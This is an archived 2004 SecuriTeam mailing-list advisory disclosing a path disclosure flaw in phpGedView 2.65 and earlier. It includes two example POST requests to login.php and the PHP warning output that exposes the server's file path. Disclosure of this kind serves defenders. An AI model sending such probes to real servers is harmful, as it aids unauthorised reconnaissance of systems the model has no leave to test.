[UNIX] PhpGedView Path Disclosure Vulnerability

From: SecuriTeam (support_at_securiteam.com)
Date: 01/26/04

  • Next message: SecuriTeam: "[NEWS] Tiny Server Multiple Vulnerabilities" 
    To: list@securiteam.com
Date: 26 Jan 2004 13:13:36 +0200

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    The SecuriTeam alerts list - Free, Accurate, Independent.

    Get your security news from a reliable source.
    http://www.securiteam.com/mailinglist.html

    - - - - - - - - -

      PhpGedView Path Disclosure Vulnerability
    ------------------------------------------------------------------------

    SUMMARY

     <http://phpGedView.sourceforge.net> phpGedView is an open source system
    for online viewing of Gedcom information (family tree and genology
    information).
    A security problem in the product allows attackers to gather the true path
    of the server-side script.

    DETAILS

    Vulnerable Systems:
     * phpGedView version 2.65 and prior

    The login.php script is not testing if a variable which is supposed to be
    POSTed has been defined before using it.

    Example:

    I - Path disclosure

    -- HTTP Client Request --

    http://target/phpGedView/login.php POST DATA: action=login

    -- HTTP Client Request --

    Username and password are missing and will generate an PHP error
    message
    displaying the Real Path.

    -- HTTP Server Reply --

    < br /> < b>Warning< /b>: Undefined index: username in
    < b>/var/www/phpGedView/login.php< /b> on line < b>36< /b>< br /> < br />
    < b>Warning< /b>: Undefined index: password in
    < b>/var/www/phpGedView/login.php< /b> on line < b>36< /b>< br /> < br />
    < b>Warning< /b>: Cannot add header information - headers already sent by
    (output
    started at /var/www/phpGedView/login.php:36) in
    < b>/var/www/phpGedView/functions_print.php< /b> on line < b>492< /b>< br
    />

    -- HTTP Server Reply --

                      -------------------------------------------

    II - Path disclosure with a valid user account

    -- HTTP Client Request --

    http://target/phpGedView/login.php POST DATA:
    action=login&url=editconfig.php&usertime=&username=admin&password=login

    -- HTTP Client Request --

    Username/password must be a valid couple. The usertime is missing and
     will
    generate an PHP error message displaying the Real Path.

    -- HTTP Server Reply --

    < br /> < b>Warning< /b>: strtotime() called with empty time parameter in
    < b>/var/www/phpGedView/login.php< /b> on line < b>39< /b>< br< br /> <
    b>Warning< /b>:
    Cannot add header information - headers already sent by (output started at
    /var/www/phpGedView/login.php:39) in < b>/var/www/phpGedView/login.php<
    /b> on
    line < b>44< /b>< br /> />

    -- HTTP Server Reply --

    Vendor Status:
    The vendor has been notified and a release version 2.65.2 with fixes for
    all the above mentioned vulnerabilities will be available soon.

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:cco@netvigilance.com> Cedric
    Cochin

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

  • Next message: SecuriTeam: "[NEWS] Tiny Server Multiple Vulnerabilities"